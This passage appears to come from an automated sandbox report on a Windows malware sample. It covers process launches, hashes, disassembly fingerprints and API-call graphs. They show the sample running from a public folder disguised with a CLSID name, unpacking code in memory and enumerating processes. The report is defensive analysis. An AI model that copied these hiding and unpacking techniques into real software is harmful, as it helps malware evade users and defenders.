                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:28
                Start time:12:11:05
                Start date:01/01/2025
                Path:C:\Windows\System32\svchost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                Imagebase:0x7ff6eef20000
                File size:55'320 bytes
                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:false

                Target ID:29
                Start time:12:11:05
                Start date:01/01/2025
                Path:C:\Windows\System32\WerFault.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100
                Imagebase:0x7ff7ddc90000
                File size:570'736 bytes
                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:30
                Start time:12:11:05
                Start date:01/01/2025
                Path:C:\Windows\System32\WerFault.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220
                Imagebase:0x7ff7ddc90000
                File size:570'736 bytes
                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:32
                Start time:12:11:27
                Start date:01/01/2025
                Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                Imagebase:0x7ff76a900000
                File size:89'088 bytes
                MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:false

                Reset < >
                  APIs
                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298A053
                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298A059
                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298A05F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: _invalid_parameter_noinfo_noreturn
                  • String ID:
                  • API String ID: 3668304517-0
                  • Opcode ID: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
                  • Instruction ID: 774a5e79b1c93baf47db36c9bad5ad7db5838a35b77f5bed1b9626aaea72411a
                  • Opcode Fuzzy Hash: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
                  • Instruction Fuzzy Hash: AFB17E71918A4C8FDB54EF28C884AAEB7E1FFE9314F64571AE489D3251DB709481CB81
                  APIs
                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298D0EB
                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298D0F1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: _invalid_parameter_noinfo_noreturn
                  • String ID:
                  • API String ID: 3668304517-0
                  • Opcode ID: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
                  • Instruction ID: fe883d202fde595aa8116f169b9545712ef1afe7919f3d3536881ee0ac293cb7
                  • Opcode Fuzzy Hash: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
                  • Instruction Fuzzy Hash: C5A16D31928B4C8BDB54EF28D885AEEB7E2FBD9310F54571AE48AC3155DB30A581CB81
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
                  • Instruction ID: b62c27f421d637907f320aae50af6f7b0cdc4461f263793091ea2e626029fd4a
                  • Opcode Fuzzy Hash: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
                  • Instruction Fuzzy Hash: BAA1C231618E0D8FCB58FF28D485AADB7E6FFA9314F04561AE44AD7150EA30E981CB85
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: _clrfp
                  • String ID:
                  • API String ID: 3618594692-0
                  • Opcode ID: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
                  • Instruction ID: 74b12c2661908b0fec1d4220fc6d39e2aa3d0b339b83089ec48a8a0ac637ec86
                  • Opcode Fuzzy Hash: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
                  • Instruction Fuzzy Hash: C5B16A31510A4D8FDF98EF1CC88AB6677E0FB59328F198599E859CB2A1C335E852CB11
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
                  • Instruction ID: 6f36d9f65b3d703e2e263f8998cd2d1b3104c1856ef679ebcf2c2d9cdbe2a1ff
                  • Opcode Fuzzy Hash: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
                  • Instruction Fuzzy Hash: 7AE16031918B8C8BC745EF68C8946BAB3E1FFE9300F545B1EE486D3155EB74A644CB81
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                  • Instruction ID: 660f31c40a7c5749aeded24e9203fa8e38276df16c924c5b1b65eb91db51dc74
                  • Opcode Fuzzy Hash: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                  • Instruction Fuzzy Hash: F061F97092CB5C4FDF28EF6C98491BAB7D5FB95720F10465FE486C3155DE70A8418AC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                  • Instruction ID: cd743210a64f267337a752a3d9cf48edec25297c7903c85d8e962c1afbdf14d7
                  • Opcode Fuzzy Hash: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                  • Instruction Fuzzy Hash: 0F51F232718E0C8F9B1CEF6CD89867673D2E7ED325315822EE40ED7265DA70D8868781
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                  • Instruction ID: 4ce6d28c10429e396da7463bc38c77a9bb9dada0a84e9f14ee591451a85ac8c6
                  • Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                  • Instruction Fuzzy Hash: CB218331B126054BE70CCE2EC89A575B3D6F7D9209B58C67DE15BCB397CA3668038A08
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                  • Instruction ID: 64865600b282af6116579572cd660b1e5abe3314f59ac25db91dd4c492d78460
                  • Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                  • Instruction Fuzzy Hash: CF11CE722108008FD75CDE3DCD8A67933D6EB99204B49C2BCE51ACB26ADA358406C644
                  APIs
                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02990DBF
                    • Part of subcall function 02993122: __GetUnwindTryBlock.LIBCMT ref: 02993165
                    • Part of subcall function 02993122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0299318A
                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02990E97
                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 029910E5
                  • std::bad_alloc::bad_alloc.LIBCMT ref: 029911F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                  • String ID: csm$csm$csm
                  • API String ID: 849930591-393685449
                  • Opcode ID: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                  • Instruction ID: 3eac2770341ae6d48f8e6e10f60406895107c42440b6e244f763027414b1a86d
                  • Opcode Fuzzy Hash: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                  • Instruction Fuzzy Hash: 30E1BF30918B498FDF24EF6CC4856AD77E5FB99324F54065EE88AD7211DB34E881CB82
                  APIs
                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 029913D0
                  • std::bad_alloc::bad_alloc.LIBCMT ref: 029916F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                  • String ID: csm$csm$csm
                  • API String ID: 3523768491-393685449
                  • Opcode ID: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                  • Instruction ID: 548c425777b1743302ca1c1c5c4e6aff300d513e9acb432d26925ee56a75b831
                  • Opcode Fuzzy Hash: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                  • Instruction Fuzzy Hash: E4E1D330918B498FDF14EF6CC4856AD7BE5FB99324F14066ED49A87652DB30E482CF82
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: AdjustPointer
                  • String ID:
                  • API String ID: 1740715915-0
                  • Opcode ID: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                  • Instruction ID: d9613274982a34ff98076ddd51d2bbe769d68ced00bf5aa6baeaf04f54af1731
                  • Opcode Fuzzy Hash: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                  • Instruction Fuzzy Hash: ACC1E030218E4A8F9F29AF2CC454275B2D5FF94334B584A6EC8AAC3255EB71D8818BC1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID:
                  • String ID: $($2$H$P!`$`
                  • API String ID: 0-2682688576
                  • Opcode ID: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
                  • Instruction ID: 844d49b1a20257b392fb37ec2a87597992a5076e05cd073ed8f1bf762b586e7a
                  • Opcode Fuzzy Hash: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
                  • Instruction Fuzzy Hash: 65C104B09187988FD7A4EF18C08879ABBE1FB99304F504A6ED8CDCB215DB705589CF46
                  APIs
                  • _CallSETranslator.LIBVCRUNTIME ref: 02991A61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: CallTranslator
                  • String ID: MOC$RCC
                  • API String ID: 3163161869-2084237596
                  • Opcode ID: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                  • Instruction ID: a46cf7ee58ddc4d0a26d582136cae46782f73927870a00b25da0e651f91c16fd
                  • Opcode Fuzzy Hash: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                  • Instruction Fuzzy Hash: E9A1C130918B498FDF19EF2CC485AADBBE1FB98314F14465EE489C7161EB34E581CB81
                  APIs
                  • __except_validate_context_record.LIBVCRUNTIME ref: 02990095
                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0299012C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: CurrentImageNonwritable__except_validate_context_record
                  • String ID: csm
                  • API String ID: 3242871069-1018135373
                  • Opcode ID: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                  • Instruction ID: 78989ba26d9f17cb6053c1975abfeda5f2329f478d2e3e2c3836709c9bbf3bd7
                  • Opcode Fuzzy Hash: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                  • Instruction Fuzzy Hash: D961C23060CA098BCF28EE5CD885B7873D5FB94365F10456DE8AAC7256EB70E8918B85
                  APIs
                  • _CallSETranslator.LIBVCRUNTIME ref: 029917E1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: CallTranslator
                  • String ID: MOC$RCC
                  • API String ID: 3163161869-2084237596
                  • Opcode ID: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                  • Instruction ID: 57da9d4770d3f2cfeab47a3b6a52c5ad337f51a387a7520c3d03d92114b98a24
                  • Opcode Fuzzy Hash: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                  • Instruction Fuzzy Hash: 2171AD30518B498FDB28EF1CD446BAAB7E0FB99324F444A5EE48DC3211DB74A581CB82
                  APIs
                  • __except_validate_context_record.LIBVCRUNTIME ref: 029928A0
                  • _CreateFrameInfo.LIBVCRUNTIME ref: 029928C9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2980000_DF2.jbxd
                  Similarity
                  • API ID: CreateFrameInfo__except_validate_context_record
                  • String ID: csm
                  • API String ID: 2558813199-1018135373
                  • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                  • Instruction ID: 5e052accb03517d18700416a81b7e33464baba83de8f503700114eb36221f2ce
                  • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                  • Instruction Fuzzy Hash: 4C5153B0518B449FDB64EF2CC48566E7BE1FB99361F50056EE489C7621DB30E842CF86

                  Execution Graph

                  Execution Coverage:59.2%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:11
                  Total number of Limit Nodes:1
                  execution_graph 89 2af0650 90 2af0665 89->90 95 2af0620 VirtualAlloc 90->95 92 2af06d0 96 2af01b0 VirtualAlloc 92->96 95->92 97 2af023b VirtualProtect 96->97 99 2af0321 VirtualFree 97->99 102 2af030c 97->102 100 2af0347 VirtualFree VirtualAlloc 99->100 100->102 101 2af0531 102->101 103 2af04f9 VirtualProtect 102->103 103->102

                  Callgraph

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.2912148615.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_2af0000_DF2.jbxd
                  Similarity
                  • API ID: Virtual$AllocFreeProtect
                  • String ID:
                  • API String ID: 267585107-0
                  • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                  • Instruction ID: f895256879b598974e8aef7cf7ee84026d8aaaefe7cf916f914f450ee4aa7b4b
                  • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                  • Instruction Fuzzy Hash: A9C1DA7021CA488FD784EF5CC498B6AB7E1FB98305F51485DF58AC7265DBB8E881CB06

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 34 2af0620-2af0644 VirtualAlloc
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.2912148615.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_2af0000_DF2.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                  • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                  • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                  • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

                  Execution Graph

                  Execution Coverage:6.4%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10%
                  Total number of Nodes:1703
                  Total number of Limit Nodes:8
                  execution_graph 10628 7ff764ccc3f0 10629 7ff764ccc423 10628->10629 10630 7ff764ccc417 10628->10630 10637 7ff764ccb4fe 10629->10637 10632 7ff764ccb420 5 API calls 10630->10632 10634 7ff764ccc382 10632->10634 10633 7ff764ccca67 10634->10633 10635 7ff764ccb3e7 fputc 10634->10635 10636 7ff764ccc1ae 19 API calls 10634->10636 10635->10634 10636->10634 10638 7ff764ccb516 10637->10638 10639 7ff764ccb3e7 fputc 10638->10639 10640 7ff764ccb523 10638->10640 10639->10638 10641 7ff764ccb56e 10640->10641 10642 7ff764ccb3e7 fputc 10640->10642 10643 7ff764ccb58a 10641->10643 10644 7ff764ccb3e7 fputc 10641->10644 10642->10640 10643->10634 10644->10641 10645 7ff764ccc7ec 10648 7ff764ccc382 10645->10648 10646 7ff764ccca67 10647 7ff764ccb3e7 fputc 10647->10648 10648->10646 10648->10647 10649 7ff764ccc1ae 19 API calls 10648->10649 10649->10648 9544 7ff764cc89e7 9545 7ff764cc8a13 CloseHandle 9544->9545 9555 7ff764cc860e 9545->9555 9546 7ff764cc8669 Process32Next 9548 7ff764cc867d GetLastError 9546->9548 9546->9555 9547 7ff764cc8ca5 CloseHandle 9549 7ff764cc8cb5 9547->9549 9548->9555 9550 7ff764cca1f1 29 API calls 9550->9555 9551 7ff764cc14e2 24 API calls 9551->9555 9552 7ff764cc88cd OpenProcess 9553 7ff764cc88ee QueryFullProcessImageNameW 9552->9553 9554 7ff764cc8a78 GetLastError 9552->9554 9553->9555 9556 7ff764cc892e GetLastError 9553->9556 9557 7ff764cc14e2 24 API calls 9554->9557 9555->9544 9555->9545 9555->9546 9555->9547 9555->9550 9555->9551 9555->9552 9559 7ff764cc8153 47 API calls 9555->9559 9558 7ff764cc14e2 24 API calls 9556->9558 9557->9555 9558->9555 9559->9555 9560 7ff764cd05e9 RemoveDirectoryA 10318 7ff764cd06e1 FreeLibrary 10650 7ff764ccafe1 strlen 10651 7ff764ccb043 10650->10651 10652 7ff764ccaff9 10650->10652 10652->10651 10653 7ff764ccb026 strncmp 10652->10653 10653->10651 10653->10652 10654 7ff764cca3e1 10655 7ff764cca43e 10654->10655 10656 7ff764cca3f9 10654->10656 10659 7ff764cc14e2 24 API calls 10655->10659 10657 7ff764cca46e 10656->10657 10658 7ff764cca3fe 10656->10658 10660 7ff764cc14e2 24 API calls 10657->10660 10661 7ff764cc9ed0 26 API calls 10658->10661 10666 7ff764cca41b 10659->10666 10660->10666 10662 7ff764cca411 10661->10662 10663 7ff764cca4a1 strlen GetProcessHeap HeapAlloc 10662->10663 10662->10666 10664 7ff764cca4d3 10663->10664 10665 7ff764cca52d 10663->10665 10664->10666 10667 7ff764cca4db strlen 10664->10667 10668 7ff764cc14e2 24 API calls 10665->10668 10672 7ff764cc6e61 10667->10672 10668->10664 10671 7ff764cca511 GetProcessHeap HeapFree 10671->10666 10673 7ff764cc6e71 10672->10673 10674 7ff764cc6e93 10672->10674 10676 7ff764cc6ec6 10673->10676 10677 7ff764cc6e76 10673->10677 10675 7ff764cc14e2 24 API calls 10674->10675 10683 7ff764cc6e85 10675->10683 10680 7ff764cc14e2 24 API calls 10676->10680 10678 7ff764cc6ef9 10677->10678 10679 7ff764cc6e7c 10677->10679 10681 7ff764cc14e2 24 API calls 10678->10681 10682 7ff764cc14e2 24 API calls 10679->10682 10679->10683 10680->10683 10681->10683 10682->10683 10683->10666 10683->10671 9577 7ff764cc65e3 9578 7ff764cc6684 9577->9578 9579 7ff764cc65f9 9577->9579 9582 7ff764cc14e2 24 API calls 9578->9582 9580 7ff764cc6602 9579->9580 9581 7ff764cc66b4 9579->9581 9584 7ff764cc66e4 9580->9584 9585 7ff764cc660e strlen 9580->9585 9583 7ff764cc14e2 24 API calls 9581->9583 9589 7ff764cc66ad 9582->9589 9583->9589 9586 7ff764cc14e2 24 API calls 9584->9586 9587 7ff764cc6620 9585->9587 9585->9589 9586->9589 9588 7ff764cc6640 strlen 9587->9588 9590 7ff764cc662f strlen 9587->9590 9596 7ff764cc743a 9588->9596 9594 7ff764cc14e2 24 API calls 9589->9594 9590->9588 9592 7ff764cc6656 strlen 9593 7ff764cc14e2 24 API calls 9592->9593 9595 7ff764cc667a 9593->9595 9594->9595 9597 7ff764cc7456 9596->9597 9597->9592 10693 7ff764ccc3dc 10694 7ff764ccb3e7 fputc 10693->10694 10697 7ff764ccc382 10694->10697 10695 7ff764ccca67 10696 7ff764ccb3e7 fputc 10696->10697 10697->10695 10697->10696 10698 7ff764ccc1ae 19 API calls 10697->10698 10698->10697 10987 7ff764ccdcdd strerror 10994 7ff764cccfc8 10987->10994 10995 7ff764cccfd8 10994->10995 10996 7ff764cccff6 strlen 10995->10996 10997 7ff764cccfef 10995->10997 10996->10997 10319 7ff764cd02d7 10320 7ff764cd02f6 10319->10320 10321 7ff764cd02fd ___lc_codepage_func ___mb_cur_max_func 10319->10321 10320->10321 10322 7ff764cd0318 10321->10322 10323 7ff764cd0358 10321->10323 10322->10323 10324 7ff764cd0323 10322->10324 10327 7ff764cd0361 10322->10327 10324->10323 10326 7ff764cd0150 4 API calls 10324->10326 10325 7ff764cd0150 4 API calls 10325->10327 10326->10324 10327->10323 10327->10325 9598 7ff764ccadd8 9599 7ff764ccadf3 9598->9599 9600 7ff764ccae3e 9598->9600 9599->9600 9601 7ff764ccae0d EnterCriticalSection LeaveCriticalSection 9599->9601 9601->9600 9602 7ff764cd05d9 SetUnhandledExceptionFilter 9603 7ff764cc89d9 9604 7ff764cc8a13 CloseHandle 9603->9604 9614 7ff764cc860e 9604->9614 9605 7ff764cc8669 Process32Next 9607 7ff764cc867d GetLastError 9605->9607 9605->9614 9606 7ff764cc8ca5 CloseHandle 9608 7ff764cc8cb5 9606->9608 9607->9614 9609 7ff764cca1f1 29 API calls 9609->9614 9610 7ff764cc14e2 24 API calls 9610->9614 9611 7ff764cc88cd OpenProcess 9612 7ff764cc88ee QueryFullProcessImageNameW 9611->9612 9613 7ff764cc8a78 GetLastError 9611->9613 9612->9614 9615 7ff764cc892e GetLastError 9612->9615 9616 7ff764cc14e2 24 API calls 9613->9616 9614->9604 9614->9605 9614->9606 9614->9609 9614->9610 9614->9611 9618 7ff764cc8153 47 API calls 9614->9618 9617 7ff764cc14e2 24 API calls 9615->9617 9616->9614 9617->9614 9618->9614 9619 7ff764cce210 9621 7ff764ccdb86 9619->9621 9620 7ff764ccccd9 fputwc fwprintf 9620->9621 9621->9619 9621->9620 9622 7ff764cce2e0 9621->9622 9623 7ff764cce301 9622->9623 9625 7ff764ccccd9 9622->9625 9626 7ff764ccccf1 9625->9626 9627 7ff764cccd06 9626->9627 9629 7ff764cccd53 9626->9629 9628 7ff764cccd2a fwprintf 9627->9628 9633 7ff764cccd31 9627->9633 9628->9633 9632 7ff764cccd58 9629->9632 9636 7ff764ccca90 9629->9636 9631 7ff764cccdab 9631->9633 9635 7ff764ccca90 fputwc 9631->9635 9632->9631 9634 7ff764ccca90 fputwc 9632->9634 9633->9623 9634->9632 9635->9631 9637 7ff764cccaa1 9636->9637 9638 7ff764cccab2 fputwc 9637->9638 9639 7ff764cccabc 9637->9639 9638->9639 9639->9629 10699 7ff764ccdc0b 10700 7ff764ccccd9 2 API calls 10699->10700 10705 7ff764ccdb86 10700->10705 10701 7ff764cce2e0 10702 7ff764cce301 10701->10702 10703 7ff764ccccd9 2 API calls 10701->10703 10703->10702 10704 7ff764ccccd9 fputwc fwprintf 10704->10705 10705->10701 10705->10704 11013 7ff764ccad0e 11014 7ff764ccad13 signal 11013->11014 11015 7ff764ccad25 signal 11014->11015 11016 7ff764ccaca1 11014->11016 11015->11016 10706 7ff764cc1001 10707 7ff764cc103c __set_app_type 10706->10707 10709 7ff764cc10a9 10707->10709 9640 7ff764ccc600 9644 7ff764ccc382 9640->9644 9641 7ff764ccc1ae 19 API calls 9641->9644 9642 7ff764ccca67 9643 7ff764ccb3e7 fputc 9643->9644 9644->9640 9644->9641 9644->9642 9644->9643 11023 7ff764cc58fa 11028 7ff764cc5189 11023->11028 11026 7ff764cc590f 11029 7ff764cc5219 CopyFileA 11028->11029 11032 7ff764cc51b1 11028->11032 11030 7ff764cc5242 GetLastError 11029->11030 11029->11032 11031 7ff764cc14e2 24 API calls 11030->11031 11038 7ff764cc526c 11031->11038 11034 7ff764cc51e8 11032->11034 11032->11038 11033 7ff764cc14e2 24 API calls 11035 7ff764cc53ba 11033->11035 11036 7ff764cc14e2 24 API calls 11034->11036 11035->11035 11037 7ff764cc5209 11036->11037 11037->11026 11039 7ff764cc4bbd 11037->11039 11038->11033 11040 7ff764cc4bd4 DeleteFileA 11039->11040 11046 7ff764cc4bde 11039->11046 11041 7ff764cc4c2b GetLastError 11040->11041 11040->11046 11042 7ff764cc14e2 24 API calls 11041->11042 11042->11046 11043 7ff764cc4d5a 11045 7ff764cc14e2 24 API calls 11043->11045 11044 7ff764cc4c0a 11047 7ff764cc14e2 24 API calls 11044->11047 11048 7ff764cc4d7c 11045->11048 11046->11043 11046->11044 11049 7ff764cc4c20 11047->11049 11048->11048 11049->11026 9652 7ff764ccddf7 9653 7ff764ccde0d 9652->9653 9660 7ff764ccd93d 9653->9660 9655 7ff764cce2e0 9656 7ff764cce301 9655->9656 9657 7ff764ccccd9 2 API calls 9655->9657 9657->9656 9658 7ff764ccccd9 fputwc fwprintf 9659 7ff764ccdb86 9658->9659 9659->9655 9659->9658 9661 7ff764ccd94e 9660->9661 9669 7ff764ccd00f 9661->9669 9664 7ff764ccd993 9673 7ff764cccc00 9664->9673 9665 7ff764ccd9a0 9677 7ff764ccd897 9665->9677 9668 7ff764ccd99e 9668->9659 9670 7ff764ccd02d 9669->9670 9683 